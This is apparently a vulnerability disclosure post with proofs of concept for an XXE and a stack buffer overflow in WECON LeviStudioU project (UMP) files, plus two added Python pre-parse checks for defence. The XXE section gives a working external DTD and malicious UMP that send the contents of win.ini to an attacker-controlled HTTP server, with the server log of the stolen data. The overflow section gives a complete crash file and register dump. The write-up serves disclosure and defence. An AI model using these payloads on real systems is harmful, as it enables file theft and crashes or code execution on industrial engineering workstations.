This post presents proofs of concept for two CVEs found in WECON LeviStudioU Release Build 2019-09-21: an XML External Entity (XXE) injection and a denial of service (DoS).
1.1 XXE
This vulnerability allows remote attackers to disclose sensitive information on affected installations of WECON LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the processing of UMP files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of Administrator.
1.2 On the attacker's machine
Save the following as "payload.dtd" and replace 192.168.136.143 with the attacker machine's IP address:
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://192.168.136.143/?x=%file;'>">
%eval;
%exfiltrate;
Start a Python HTTP server on the attacker's machine to serve payload.dtd:
python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
1.3 On the victim's machine
The victim has to import the "poc.ump" file into LeviStudioU (Projects -> Open Project -> open poc.ump). This throws an error, but by then the file contents have already been sent to the attacker.
poc.ump file content:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hack [
<!ELEMENT x ANY >
<!ENTITY % alpha SYSTEM "http://192.168.136.143/payload.dtd">
%alpha;
%bravo;
]>
<x>&charlie;</x>
<note>
<to>Alice</to>
<from>Bob</from>
<header>Sync Meeting</header>
<time>1200</time>
<body>Meeting time changed</body>
</note>
1.4 On the attacker's machine
We should see two requests: one for the DTD and one carrying the URL-encoded contents of win.ini in the "x" query parameter.
python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.136.149 - - [03/Nov/2020 06:20:12] "GET /payload.dtd HTTP/1.1" 200 -
192.168.136.149 - - [03/Nov/2020 06:20:12] "GET /?x=;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
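The mitigation side of this finding, added here as an example that is not part of the original write-up or of the vendor's code: a pre-parse check that loads a UMP document with Python's expat but refuses every external entity fetch, so the DTD chain above is reported instead of followed. The embedded sample is the poc.ump shown above; the benign project snippet is constructed.

```python
import xml.parsers.expat

# The poc.ump from the write-up, embedded as the sample input. The handler
# below returns 0 on the first external reference, so nothing is requested.
POC_UMP = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hack [
<!ELEMENT x ANY >
<!ENTITY % alpha SYSTEM "http://192.168.136.143/payload.dtd">
%alpha;
%bravo;
]>
<x>&charlie;</x>
<note><to>Alice</to><from>Bob</from></note>
"""

# Constructed benign project file: no DOCTYPE, no entities at all.
BENIGN_UMP = '<?xml version="1.0" encoding="UTF-8"?><project filever="1.0"><TrendSet/></project>'


def audit_ump(xml_text):
    """Parse with expat while refusing to resolve any external entity.

    Returns {"safe": bool, "findings": [str]}; any external DTD subset,
    external entity declaration or attempted fetch is a finding."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    # Ask expat to expand parameter entities such as %alpha; so the reference
    # reaches our handler instead of being skipped silently.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if sysid or pubid:
            findings.append(f"DOCTYPE {name} loads external subset {sysid or pubid}")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid or pubid:
            kind = "parameter" if is_param else "general"
            findings.append(f"external {kind} entity {name} -> {sysid or pubid}")

    def on_external_ref(context, base, sysid, pubid):
        findings.append(f"blocked fetch of {sysid or pubid}")
        return 0  # 0 tells expat to abort the parse right here

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError as err:
        if not findings:  # a parse error unrelated to entities still fails closed
            findings.append(f"malformed XML: {err}")
    return {"safe": not findings, "findings": findings}
```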
2.1 DoS
The vulnerability exists due to a boundary error when parsing the TrendSet tag within UMP files. A remote, unauthenticated attacker can trick the victim into opening a specially crafted UMP file, triggering a stack-based buffer overflow and potentially executing arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.
2.2 Crash PoC
<?xml version="1.0" encoding="UTF-8"?>
<project filever="1.0" ProjectVer="2.0">
<PlcSet Count="1" Language="0">
<Connection>
<PLC Type="WECON SIMUTOCOL" Driver="simutocol.dll" HmiStatNo="0" PlcStatNo="0"/>
<CommSet Port="COM1" ComType="0" BaudRate="9600" StopBit="1" DataLength="8" CheckBit="NONE" WaitTimeout="10" RevTimeout="10" RetryTimes="2" RetryTimeOut="3" ComIoDelayTime="0" ComStepInterval="0"/></Connection></PlcSet>
<HmiSet Type="LEVI 2070" Width="800" Height="480" HmiTypeIndex="30" Language="0" StartScrNo="0" Style="Windows Classic"/>
<AddressLib/><StringLib Language="0"/><AlarmSet>
<Alarm bitaddr="HDX0.0" Trigger="1" bSave="1" bPrint="0" Fast="0" UseBuzzer="0" StrIndex="bbbb" TextColor="0x0" ScreenNo="-1" bSaveUnChain="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/>
<Alarm bitaddr="HDX0.0" Trigger="1" bSave="1" bPrint="0" Fast="0" UseBuzzer="0" StrIndex="fff" TextColor="0x0" ScreenNo="-1" bSaveUnChain="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/></AlarmSet>
<TrendSet>
<Trend IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/>
<Trend IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/></TrendSet>
<XYSet WordAddr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<XY IsContinue="1" WordAddr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/>
<XY IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/></XYSet>
<DiscSet>
<Disc IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" CircleTime="1" stCount="1"/>
<Disc IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" CircleTime="1" stCount="1"/></DiscSet>
<EventSet/>
<SysSet>
<SecSet/>
<NETSet NETIPaddr="192.168.1.2" NETMASKaddr="255.255.255.0" NETWayaddr="192.168.1.1"/>
<BaseSet StorePattern="1" Background="-1" AlarmScrSave="0" JianGe="0" OsLanguage="1" IsScrIdVar="0" BgOnOffBitAddr="" ScrIdWordAddr="HDW0" CurScrIdAddr="" SysLen="0" IsScrFast="0" IsuseTTS="0" IsUseAuthority="0" IsUseOptLogFunc="0" IsUseSNMP="0" IsUDKeyboard="0" IsNShowPOPUP="0" IsEncrypt="0" nWallId="1" FloatHiLowReverse="0" HMINAME="" ProtectScreen="0" ProtectScreenTime="0" ProtectScreenNo="0" IsShowNC="0" IsHighWord="0" IsEnterTime="0" IsPowerEnterTime="0" EnterTime="" PowerEnterTime="" bAlCache="0" CacheValue="0" UseHideOperability="0" Operability="0"/></SysSet>
<ScreenSet>
<ScreenInfo ScrnNo="0" Child="0" ScrnName="Screen" Height="480" Width="800" Filled="1" BkColor="0xd8e9ec" FnColor="0xd8e9ec" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="0.hsc" Opened="1"/>
<ScreenInfo ScrnNo="1000" Child="1" ScrnName="BuilNum" Height="360" Width="600" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1000.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1001" Child="1" ScrnName="BuilKey" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1001.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1002" Child="0" ScrnName="Common Window" Height="480" Width="800" Filled="1" BkColor="0xffffff" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1002.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1003" Child="1" ScrnName="Fast Selection" Height="460" Width="100" Filled="1" BkColor="0xffffff" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1003.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1004" Child="1" ScrnName="UserPwdKb" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1004.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1006" Child="1" ScrnName="UserTimeKb" Height="380" Width="250" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1006.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1007" Child="1" ScrnName="UserTrdKb" Height="250" Width="400" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1007.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1008" Child="1" ScrnName="UserDataPwdKb" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1008.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1009" Child="1" ScrnName="Installpaymentset" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1009.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1010" Child="1" ScrnName="InstallpaymentPwd" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1010.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1011" Child="1" ScrnName="UserLogin" Height="244" Width="394" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1011.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1012" Child="1" ScrnName="UserChangePSW" Height="264" Width="394" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1012.hsc" Opened="0"/></ScreenSet><WordAlarmSet>
<Alarm Name="Word alarm 0Word alarm 0Word alarm 0" WordAddr="HDW0" HWordAddr="" LWordAddr="" HLimit="100" LLimit="100" EqualAlarmValue="" DataFormat="2" UseBuzzer="0" DigitCount="4 0" AlType="0" bSave="1" bPrint="0" Fast="0" NotSaveBeforeAlarmRemove="0" IsVar="0" StrIndex="" ScreenNo="-1" bSaveUnChain="0" IsInRangeAlarm="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/>
<Alarm Name="Word alarm 1Word alarm 1Word alarm 1" WordAddr="HDW0" HWordAddr="" LWordAddr="" HLimit="100" LLimit="100" EqualAlarmValue="" DataFormat="2" UseBuzzer="0" DigitCount="4 0" AlType="0" bSave="1" bPrint="0" Fast="0" NotSaveBeforeAlarmRemove="0" IsVar="0" StrIndex="" ScreenNo="-1" bSaveUnChain="0" IsInRangeAlarm="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/></WordAlarmSet>
<MultiLink>
<Extra bitaddr="HDX0.0" WordAddr="" DataLen="1"/>
<Extra bitaddr="HDX0.0" WordAddr="" DataLen="1"/></MultiLink>
<DataLogSet>
<Group FileName="Group0Group0Group0Group0Group0Group0Group0Group0" Timer="6" Interval="60" Trigger="0" TriggAddr="" BinaryMode="0" ErrorUseZero="0">
<Data Name="Channel0Channel0Channel0Channel0Channel0Channel0Channel0Channel0" WordAddr="HDW0" DataFormat="2" Len="0" DigitCount="4 0"/></Group>
<Group FileName="Group1Group1Group1Group1Group1Group1Group1Group1" Timer="6" Interval="60" Trigger="0" TriggAddr="" BinaryMode="0" ErrorUseZero="0">
<Data Name="Channel0Channel0Channel0Channel0Channel0Channel0Channel0Channel0" WordAddr="HDW0" DataFormat="2" Len="0" DigitCount="4 0"/></Group></DataLogSet>
</project>
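A defender-side length check for UMP attribute values, added here as an example (not from the original post or from WECON): every address in the crash PoC above is a short register name such as "HDW0" or "HDX0.0", except the WordAddr of the XY element, which is several hundred bytes long. The 32-character address limit, the 256-character general limit, the list of address attributes and the trimmed sample document are constructed assumptions.

```python
import xml.parsers.expat

# Constructed excerpt of the crash PoC above: real addresses look like "HDW0",
# while the XY element carries a 256-byte WordAddr.
CRASH_UMP = (
    '<?xml version="1.0" encoding="UTF-8"?><project filever="1.0">'
    '<TrendSet><Trend IsContinue="1" WordAddr="HDW0" Count="100"/></TrendSet>'
    '<XYSet WordAddr="' + "A" * 32 + '">'
    '<XY IsContinue="1" WordAddr="' + "A" * 256 + '" Count="100"/></XYSet>'
    '<DataLogSet><Group FileName="' + "Group0" * 8 + '" Timer="6"/></DataLogSet>'
    '</project>'
)

# Assumed limits (not vendor-specified): address attributes are short register
# names; names and file names are allowed a longer value.
ADDR_ATTRS = {"WordAddr", "bitaddr", "HWordAddr", "LWordAddr",
              "TriggAddr", "WordAddr9", "WordAddr10"}
MAX_ADDR_LEN = 32
MAX_OTHER_LEN = 256


def find_oversized_attrs(xml_text, addr_max=MAX_ADDR_LEN, other_max=MAX_OTHER_LEN):
    """Return (element path, attribute, length) for each attribute value that
    exceeds its limit, e.g. [("project/XYSet/XY", "WordAddr", 256)]."""
    hits = []
    path = []
    # expat fetches no external entities unless a handler is installed, so
    # this pre-check does not reopen the XXE issue from section 1.
    parser = xml.parsers.expat.ParserCreate()

    def start(name, attrs):
        path.append(name)
        for attr, value in attrs.items():
            limit = addr_max if attr in ADDR_ATTRS else other_max
            if len(value) > limit:
                hits.append(("/".join(path), attr, len(value)))

    def end(name):
        path.pop()

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return hits


def is_safe_to_open(xml_text):
    """Gate in front of the legacy parser: pass the file on only when clean."""
    return not find_oversized_attrs(xml_text)
```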
2.3 Register dump
EAX 00000000
ECX 775BF8C8 ASCII "
STATUS_STACK_BUFFER_OVERRUN encountered
"
EDX 0000002B
EBX 00000001
ESP 0018CFB8
EBP 0018D034
ESI 00000000
EDI 00000000
EIP 775BF56B KERNELBA.775BF56B
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7FFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1